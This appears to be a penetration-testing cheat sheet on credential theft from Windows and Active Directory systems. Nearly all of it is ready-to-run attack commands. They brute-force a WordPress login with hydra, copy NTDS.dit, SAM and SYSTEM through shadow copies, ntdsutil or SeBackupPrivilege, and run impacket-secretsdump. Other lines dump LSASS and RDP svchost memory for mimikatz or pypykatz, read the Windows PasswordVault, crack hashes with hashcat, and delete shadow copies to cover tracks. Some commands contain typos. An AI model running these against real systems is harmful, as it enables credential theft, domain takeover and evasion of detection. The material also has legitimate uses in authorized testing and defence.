Credential Theft





Generate a Password Wordlist


haschat --force --stdout pwdlist.txt  -r /usr/share/hashcat/rules/best64.rule 


hydra -l admin -P /usr/share/wordlists/rockyou.txt http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect'

Credential Stealing Cheat-Sheet

Volume Shadow Copy

This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they are protected.

  • Requires DC compromise.

  • We need 2 files:

    • NTDS.dit

    • SYSTEM file .Bootkey [Stored in registry HKLM\SYSTEM]

  • SYSTEM file contains the Boot Key that will be needed to decrypt the NTDS.dit file.

  • Reference: Stealthbits

#Remotely with DA clear-text password
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log"
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumneShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit 2>&1 > c:\vss2.log"
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumneShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive 2>&1 > c:\vss2.log"

#Remotely with DA Pass-the-ticket
wmic /authority:"Kerberos:<domain\DC-hostname>" /node:<DC-Hostname> process call create  "..<Same as above>.."

#Remotely via PSRemote 
Powersploit's Invoke-NinjaCopy

#NTDSUtil.exe. Access to DC is required to execute. Tool used by Sysadmins. 
Create an "install from media" makes a copy of NTDS.dit & SYSTEM registry hive:
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

#Create a volume shadow copy
vssadmin create shadow /for=C:

#Retrieve Ntds.dit file from Volume Shadow Copy
copy <Shadow directory>\ntds.dit  c:\Temp\ntds.dit

#Copy SYSTEM & SAM Hive file from registry.
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak

#Delete tracks
vssadmin delete shadows /shadow={<Shadow Copy ID>}

#With DA privs, save NTDS.dit to C:\Temp
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
#Add -history for password history -sam SAM -system SYSTEM LOCAL -sam SAM -security SECURITY -system SYSTEM LOCAL

#Remotely extract credentials
sudo python3 <domain>/<username>:'<pass>'@<IP>
impacket-secretsdump -just-dc-ntlm offense/administrator@
#Create a file called cmd in C:\windows\temp\

#cmd Contents:
set context persistent nowritersadd volume c: alias tempcreateexpose %temp% h:exit

#Create a shadow volume accessible via the H:
diskshadow /s cmd 

# upload SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll

import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
Copy -FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy -FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
  • With SeBackupPrivilege, we can create a backup of c:\windows\ntds and restore ntds.dit without the ACLs. Refer ACL Abuse section for more details.


#Dump memory from LSASS.exe. Using TaskManager(as admin), right-click on process, Create Dump

#procdump is a Windows sysinternal tool.
procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"

#Extract using mimikatz
sekurlsa::minidump lsass.dmp

pypykatz lsa minidump lsass.DMP
pypykatz lsa minidump lsass.DMP | grep 'NT:' | awk '{print $2}' | sort -u > hashes

Cracking Hashes

hashcat -m 5600 hash_file rockyou.txt  --force

#Brute-force - Mask attack []
hashcat.exe -a 3 -m 5600 hashes.txt -1 ?l?d?u -2 ?u ?2?1?1?1?1?1?1 -o cracked.txt -O

hashcat -m 5600 hash.txt rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule

Hashes from Memory Dump

  1. Analyze the memory dump for possible profile/OS

#Download from

#Identify profile
volatility -f memoryFile.dmp imageinfo 

2. Extract hashes from the memory dump

volatility -f memoryFile.dmp --profile Win2012R2x64 hashdump
hashcat.exe -m 1410 creds.txt wordlist.txt -O

Crack GPP Password

#Crack GPP Password
gpp-decrypt hashed_pass

#.DOCX file
python dummy.docx > hash.txt
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt

Credential Vault

Initializing the PasswordVault Object

#Load the Credentials and PasswordVault assemblies:

#Instantiate an object of the PasswordVault class to work with:
$vault = New-Object Windows.Security.Credentials.PasswordVault

#Read contents of the vault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Passwords from RDP Sessions

Reference : Blog

Note: Tested only on Server 2012R2. [Failed on 2016]

  • Identify active RDP sessions

  • RDP Hijack if necessary.

  • Identify svchost process ID

  • Use Task manager/procdump/processhacker to generate a Dump of svchost process.

  • Exfil dump file and use strings to grep password.

  • Password is usually right below the username

#Run as admin
query user

#Identify svchost process ID
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1

#Dump process memory
#Task-manager: Right-click - Create dump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#Grep for password:
strings -el svchost* | grep Password123 -C3
. .\strings64.exe <Dump.dmp> | Select-String "Grepthis" -Context 3,3
privilege::debug ts::logonpasswords

Last updated